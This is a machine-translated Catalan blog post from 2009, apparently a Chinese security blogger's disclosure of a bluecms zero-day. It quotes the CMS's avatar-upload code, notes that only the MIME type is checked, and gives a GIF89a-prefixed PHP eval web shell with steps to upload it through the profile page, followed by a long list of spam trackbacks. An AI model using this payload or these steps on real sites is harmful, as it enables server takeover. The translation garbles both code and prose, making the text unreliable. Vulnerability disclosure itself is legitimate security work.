RSS

bluecms 0 dies

Aquesta entrada va ser publicada el 7 octubre 2009

: St0p
Reproduït si us plau indiqui la font: http://www.st0p.org

Nota: Ho sentim, la versió del cabell al matí a la nit es diu de doble a la premsa un 0 Dies, va informar, i només ha d'anar a l'oficial va mirar, i ha llançat un pegat de seguretat abans ah .. es pot anar en línia no és una versió actualitzada de la prova ...

Per desgràcia, el grup Un amic meu va fer un CMS, va dir que les dades del usuari per modificar alguns poden ser injectats, va dir que l'anàlisi, amb la instal · lació local després, no poden usar les cometes simples són escapades magic_quotes_gpc = off. . .

Vegi inclou la línia / common.inc.php, donar-se per vençut. . 

  A
 2
 3
 4
 5
 6
 7
 8
 9

  ......
  ! get_magic_quotes_gpc ( ) ) if (! get_magic_quotes_gpc ())
  {
 	 deep_addslashes ( $_POST ) ; $ _POST = Deep_addslashes ($ _POST);
 	 deep_addslashes ( $_GET ) ; $ _GET = Deep_addslashes ($ _GET);
 	 deep_addslashes ( $_COOKIES ) ; US $ = _COOKIES Deep_addslashes ($ _COOKIES);
 	 deep_addslashes ( $_REQUEST ) ; $ _REQUEST = Deep_addslashes ($ _REQUEST);
  }
 ......

Potser st0p la bona sort, veure pujar fotos de les parts, l'anàlisi de codi, usa alguna cosa que es troba en user.php. . 

  A
 2
 3
 4
 5
 6

  BLUE_ROOT . 'include/upload.class.php' ) ; //调用上传类 require_once (BLUE_ROOT. 'include / upload.class.php'); / / cridar a la classe de càrrega
     new upload ( ) ; $ Imatge = new la càrrega ();
	  isset ( $_FILES [ 'face_pic' ] [ 'error' ] ) && $_FILES [ 'face_pic' ] [ 'error' ] == 0 ) { if (isset ($ _FILES ['face_pic'] ['error']) && $ _FILES ['face_pic'] ['error'] == 0) {
		 $image -> img_upload ( $_FILES [ 'face_pic' ] , 'face_pic' ) ; $ = $ Face_pic la imatge - img_upload> ($ _FILES ['face_pic'], 'face_pic'); 
                          / / No es va detectar directament en el sufix, la classe serà capaç de passar SHELL
	 }

Obriu els include / upload.class.php només per detectar la capçalera de l'arxiu no detecta el sufix 

  A
 2
 3
 4
 5
 6
 7
 8
 9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27

 upload { private $allow_image_type = array ( 'image/jpg' , 'image/gif' , 'image/png' , 'image/pjpeg' ) ; ...... function img_upload ( $file , $dir = '' , $imgname = '' ) { if ( empty ( $dir ) ) { $dir = BLUE_ROOT . DATA . UPLOAD . date ( "Ym" ) . "/" ; } else { $dir = BLUE_ROOT . DATA . UPLOAD . $dir . "/" ; } if ( ! file_exists ( $dir ) ) { if ( ! mkdir ( $dir ) ) { showmsg ( '上传过程中创建目录失败' ) ; } } if ( empty ( $imgname ) ) { $imgname = $this -> create_tempname ( ) . $this -> get_type ( $file [ 'name' ] ) ; } $imgname = $dir . $imgname ; if ( ! in_array ( $file [ 'type' ] , $this -> allow_image_type ) ) { //只是检测了文件头部来着,那我们就直接构造一个SHELL就好了 showmsg ( '不允许的图片类型' ) ; } } Classe de càrrega ...... {private $ allow_image_type = array ('image / jpg "," image / gif', 'image / jpeg', 'image / jpeg'); img_upload ...... funció ($ arxiu, $ dir ='', $ nombreimg ='') {if (empty ($ dir)) {$ dir = BLUE_ROOT DADES Data de tramesa ("AM") "/", ....} else {$ dir = BLUE_ROOT Càrrega de dades $ dir "/", ..} if (file_exists ($ dir)) {if (mkdir ($ dir)) {showmsg ('el procés de càrrega no s'ha pogut crear el directori');}} si (empty ($ nombreimg)) {$ nombreimg = $ this -> create_tempname () $ this -> ($ arxiu ['name']) get_type;.} $ = $ dir nombreimg $ nombreimg if (in_array ($.! arxiu ['type'], $ this -> allow_image_type)) {/ / només per detectar la capçalera de l'arxiu amb el, que directament la construcció d'una petxina com un showmsg del tipus d'imatge ('no permès');}}

L'estalvi per sobre de st0p.php 

  A
 2

  GIF89a
 ( $_POST [ st0p ] ) ; ?> <Php Eval ($ _POST [st0p]);?>

Nota Xarxa compte d'accés, els Estats membres -> el meu perfil, a continuació, carregar la nova imatge de l'elecció es va construir un arxiu PHP, punt per confirmar modificar, veure l'adreça és correcta, feu clic a la foto directament en la línia. . SHELL Paraula pujat amb èxit!

bluecms-0day1

bluecms-0day2

L'anàlisi s'ha completat, espero que més intercanvis, el tema d'aquestes coses, només vull conèixer a alguns amics per parlar de tecnologia, establir un grup així, només un grup ordinari, la gent només 100, la neteja, mai parlen s'ha carregat malament el caos T B, deprimit, grup obert és l'intercanvi, no parlen ha estat marcador de posició en el seu lloc, desitja el progrés, el camí al marge no pot anar!
Si en el grup només per obtenir els resultats de les discussions dels altres dels altres, no sé a pagar, o acaba d'arribar el submarinisme, o sense. . .

, , ,
Aprendre · Les arts marcials Trucs
Chinese (Simplified) flagItalian flagKorean flagChinese (Traditional) flagPortuguese flagEnglish flagGerman flagFrench flagSpanish flagJapanese flagArabic flagRussian flagGreek flagDutch flagBulgarian flagCzech flagCroatian flagDanish flagFinnish flagHindi flagPolish flagRomanian flagSwedish flagNorwegian flagCatalan flagFilipino flagHebrew flagIndonesian flagLatvian flagLithuanian flagSerbian flagSlovak flagSlovenian flagUkrainian flagVietnamese flagAlbanian flagEstonian flagGalician flagMaltese flagThai flagTurkish flagHungarian flag


71 Responses to "bluecms 0 dies"

  1. Per хостинг el 17 novembre 2009 | Respondre

    Ja, je verjetno zato


  1. 70 Trackback (s)

  2. 8 juliol 2011: Guia per a principiants Llapis, Dibuix
  3. 21 desembre 2011: el taxi de Boston
  4. 24 desembre 2011: Jardiners in Crouch End N8
  5. 25 desembre 2011: Els jardiners del paisatge de Londres
  6. 6 gener 2012: llibres electrònics
  7. 17 gener 2012: la tecnologia definitiva ¿supercubeï ½ 6000
  8. 18 gener 2012: Nutrició Esportiva
  9. 19 gener 2012: Whatman, Cartutxos d'extracció
  10. 19 gener 2012: 1 tiu
  11. 21 gener 2012: portarollo
  12. 24 gener 2012: antykwariaty
  13. 29 gener 2012: ï »¿ Alpha Serveis de garantia,
  14. 29 gener 2012: Serveis de Alpha Garantia
  15. Gen 30, 2012: prediccions nba
  16. 30 gener 2012: el fotògraf del casament Manistee
  17. 31 gener 2012: Wof Christchurch
  18. 31 gener 2012: free porn videos a
  19. 31 gener 2012: Samarreta de culturisme t
  20. 4 febrer 2012: la probabilitat de NFL
  21. 5 febrer 2012: On apostar Super Bowl 46
  22. 6 febrer 2012: lesió a l'esquena
  23. 6 febrer 2012: Anuncis classificats gratis
  24. 7 febrer 2012: st george quiropràctic
  25. 7 febrer 2012: clarividents Regne Unit
  26. 9 febrer 2012: apostes esportives
  27. 9 febrer 2012: Tècnic de flebotomia
  28. 10 febrer 2012: peces de recanvi mazda
  29. 12 febrer 2012: serralleria de cotxes a Port Richmond, Nova York
  30. 13 febrer 2012: Agustus
  31. 15 febrer 2012: trycholog Gdynia
  32. 18 febrer 2012: cupons de canvi d'oli
  33. 19 febrer 2012: la part superior d'apostes asiàtic
  34. 22 febrer 2012: Donald petit Bobby d'ajupir abonnement
  35. 22 febrer 2012: Auckland drainlayer
  36. 25 febrer 2012: la llum psíquica
  37. 26 febrer 2012: Elektrik
  38. 26 febrer 2012: l'assistent de teràpia física
  39. 1 març 2012: el món campistes
  40. 3 març 2012: psíquics
  41. 7 març 2012: Abdel-Malik
  42. 8 març 2012: NZ llars
  43. 8 març 2012: ajudes swing de golf
  44. 10 març 2012: fusteria d'Auckland
  45. 12 març 2012: lectures psíquiques
  46. 13 març 2012: nit de les gallines
  47. 14 març 2012: Aboubakar
  48. 18 març 2012: Jocs en línia
  49. 19 març 2012: Alisson
  50. 23 març 2012: NBA Seleccions
  51. 23 març 2012: llibertat psíquica al xat
  52. 24 març 2012: portes de seguretat NZ
  53. 27 març 2012: les botigues de senderisme
  54. 29 març 2012: cases de repòs polz Auckland
  55. 30 març 2012: Els inspectors d'Auckland
  56. 31 març 2012: els peixos de la botiga en línia
  57. 3 abril 2012: Ares, Free Download
  58. 7 abril 2012: Szkola Jazdy Gdynia opinie
  59. 10 abril 2012: antykwariaty
  60. 18 abril 2012: Persianes
  61. 18 abril 2012: Beats by Dre Gratuït
  62. 20 abril 2012: Paquets de Fiji
  63. 22 abril 2012: Comercialització del lloc
  64. 22 abril 2012: treehouses
  65. 22 abril 2012: Aïllament Dinàmic
  66. 22 abril 2012: dels tatuatges tribals
  67. 22 abril 2012: Rànquing de Posicionament en cercadors,
  68. 22 abril 2012: Curs de Gestió de la Cadena de Subministrament,
  69. 22 abril 2012: la CIA Test Prep
  70. 24 abril 2012: finestres d'Auckland
  71. 24 abril 2012: Chanel, RELLOTGES

Vostè ha d'estar loguejat per publicar un comentari.